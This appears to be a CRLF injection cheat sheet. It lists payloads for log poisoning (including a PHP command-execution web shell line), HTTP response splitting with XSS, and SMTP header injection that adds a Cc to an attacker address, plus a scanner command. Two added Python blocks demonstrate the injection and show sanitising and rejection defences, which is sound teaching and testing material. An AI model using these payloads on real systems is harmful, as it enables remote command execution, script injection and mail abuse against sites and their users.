CRLF injection

Description           Character   ASCII (Dec)   Hex      URL Encoded
Carriage Return (CR)  \r          13            0x0D     %0D
Line Feed (LF)        \n          10            0x0A     %0A
CRLF                  \r\n        13 10         0x0D0A   %0D%0A

Log injection

# Log poisoning
%0D%0A<?php system($_GET['cmd']); ?>
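The log poisoning payload above works because a percent-decoded %0D%0A lands in the log file verbatim and starts a new record. The following is an added example, not code from the original page: it shows the vulnerable write pattern beside one that escapes CR, LF and other control characters before the value is formatted, so a single request can only ever produce one log record. The function names, the log format and the forged-entry payload are constructed for the demonstration.

```python
"""Added example (not from the original page): neutralising CR/LF before a
user-controlled value reaches a log file, so one request cannot forge extra
log records.  Log format, function names and sample values are constructed."""
from urllib.parse import unquote

# CR and LF get readable escapes; any other control character is hex-escaped.
_NAMED = {"\r": "\\r", "\n": "\\n"}


def sanitize_for_log(value: str) -> str:
    """Escape control characters so the value cannot break out of its line."""
    out = []
    for ch in value:
        if ch in _NAMED:
            out.append(_NAMED[ch])
        elif ord(ch) < 0x20 or ch == "\x7f":
            out.append(f"\\x{ord(ch):02x}")
        else:
            out.append(ch)
    return "".join(out)


def unsafe_log_line(user: str) -> str:
    """Vulnerable pattern: the decoded request parameter is written verbatim."""
    return f"[INFO] login attempt user={user}\n"


def safe_log_line(user: str) -> str:
    """Hardened pattern: the value is escaped before it is formatted."""
    return f"[INFO] login attempt user={sanitize_for_log(user)}\n"


def count_records(log_text: str) -> int:
    """Number of records a line-oriented log reader (or a log viewer) sees."""
    return len([line for line in log_text.split("\n") if line])


def records_written(user: str, safe: bool) -> int:
    """How many log records a single request with this parameter produces."""
    line = safe_log_line(user) if safe else unsafe_log_line(user)
    return count_records(line)


# Constructed payload: the page's URL-encoded CRLF followed by a forged entry.
# Web frameworks percent-decode query parameters before the handler sees them,
# which is why the raw \r\n reaches the log.
PAYLOAD = unquote("alice%0D%0A[INFO] login attempt user=admin status=ok")

if __name__ == "__main__":
    print("unsafe:", records_written(PAYLOAD, safe=False), "records")
    print("safe:  ", records_written(PAYLOAD, safe=True), "record")
    print(safe_log_line(PAYLOAD), end="")
```

Escaping rather than stripping keeps the evidence: a sanitized line still shows the literal `\r\n` and the forged text, which is exactly what a detection rule on the log pipeline should alert on.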

HTTP response splitting

# HTTP header
%0D%0AHeader-Test: value-test
# XSS
%0D%0A%0D%0A<html><script>alert(1)</script></html>
# HTTP header Content-Type + XSS
%0D%0AContent-Type: text/html%0D%0A%0D%0A<html><script>alert(1)</script></html>

SMTP header injection

# SMTP header
%0D%0AHeader-Test: value-test
## URL-encoded variant (space as +)
%0D%0AHeader-Test:+value-test

# SMTP header Cc
%0D%0ACc: email@attacker.com
%0D%0ACc: email@attacker.com%0D%0ADoesNotExist: True
## URL-encoded variant (space as +, @ as %40)
%0D%0ACc:+email%40attacker.com
%0D%0ACc:+email%40attacker.com%0D%0ADoesNotExist:+True
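HTTP responses and SMTP messages both carry CRLF-terminated "Name: value" header lines, so the HTTP response splitting payloads and the SMTP header injection payloads above exploit the same defect and share the same fix. The block below is an added example, not code from the original page: it serialises a header block with and without validation, parses the result the way a client or MTA would, and shows the extra `Header-Test` and `Cc` headers appearing only in the unvalidated case. The builder, the parser and the sample header values are constructed; the injected fragments are the page's own URL-encoded payloads after decoding.

```python
"""Added example (not part of the original page): rejecting CR/LF in header
values so a decoded %0D%0A cannot add headers to an HTTP response or an SMTP
message.  Builder, parser and sample values are constructed for this demo."""
from urllib.parse import unquote, unquote_plus

# Characters that can terminate a header line or truncate it in a C-based parser.
FORBIDDEN = frozenset("\r\n\x00")


class HeaderInjection(ValueError):
    """Raised when a value would break out of its header line."""


def validate_header_value(value: str) -> str:
    """Return the value unchanged if it cannot end or add a header line."""
    bad = FORBIDDEN.intersection(value)
    if bad:
        raise HeaderInjection(f"control characters in header value: {sorted(map(repr, bad))}")
    return value


def is_rejected(value: str) -> bool:
    """True if the hardened check refuses this value."""
    try:
        validate_header_value(value)
    except HeaderInjection:
        return True
    return False


def render_headers(headers: list, validate: bool) -> str:
    """Serialise a header block (HTTP or SMTP).  validate=False is the
    vulnerable pattern; validate=True is the hardened one."""
    lines = []
    for name, value in headers:
        if validate:
            value = validate_header_value(value)
        lines.append(f"{name}: {value}")
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_header_block(raw: str) -> dict:
    """What a browser or MTA sees: split on CRLF, stop at the blank line."""
    head, _, _body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n"):
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


# Constructed inputs built from the page's URL-encoded payloads.  Query
# parameters are percent-decoded by the framework; form fields additionally
# turn "+" into a space, hence unquote_plus for the SMTP case.
HTTP_LOCATION = unquote("/home%0D%0AHeader-Test: value-test")
SMTP_SUBJECT = unquote_plus("hello%0D%0ACc:+email%40attacker.com")


def http_headers_seen(validate: bool) -> dict:
    """Headers a client would parse from a redirect built with HTTP_LOCATION."""
    raw = render_headers([("Location", HTTP_LOCATION), ("Content-Length", "0")], validate)
    return parse_header_block(raw)


def smtp_headers_seen(validate: bool) -> dict:
    """Headers an MTA would parse from a message built with SMTP_SUBJECT."""
    raw = render_headers([("From", "noreply@example.com"), ("Subject", SMTP_SUBJECT)], validate)
    return parse_header_block(raw)


if __name__ == "__main__":
    print("HTTP, unvalidated:", http_headers_seen(False))
    print("SMTP, unvalidated:", smtp_headers_seen(False))
    print("rejected by check:", is_rejected(HTTP_LOCATION), is_rejected(SMTP_SUBJECT))
```

Rejecting the value (rather than silently stripping the CR/LF) is the safer default for headers: a stripped value may still be wrong for the application, and the rejection is a clear signal to log and alert on. Mature HTTP and mail libraries already raise on these characters, so the check matters most in hand-rolled header or message builders.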

Tools

CRLFsuite

crlfsuite -t http://<target>/param1=value1&param2=value2
